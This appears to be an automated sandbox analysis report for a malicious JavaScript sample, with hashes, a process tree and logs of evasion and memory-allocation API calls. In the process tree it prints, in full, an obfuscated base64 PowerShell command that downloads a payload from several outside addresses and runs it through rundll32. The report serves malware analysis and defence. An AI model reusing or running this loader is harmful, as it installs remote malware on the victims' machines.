Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 25, 2023, 10:45 a.m.	May 25, 2023, 10:47 a.m.

Size	274.9KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`30b9760a9d321a493485d3478333b8ba`
SHA256	`0368887ac450313dd1bc075d9f50125dc5bf61c97c7e317b73dd4f892d94c5d3`
CRC32	`39446A2C`
ssdeep	`6144:b+5CgfIu3qCNKQAa2gUnoJPkto74cAx3CG:jIwtxp`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\exosporeEloper.js
2584
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising
  2860
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
    2972

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 25, 2023, 10:44 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b4d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067b098 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067ba58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bdd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0067bd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 25, 2023, 10:44 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02781000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
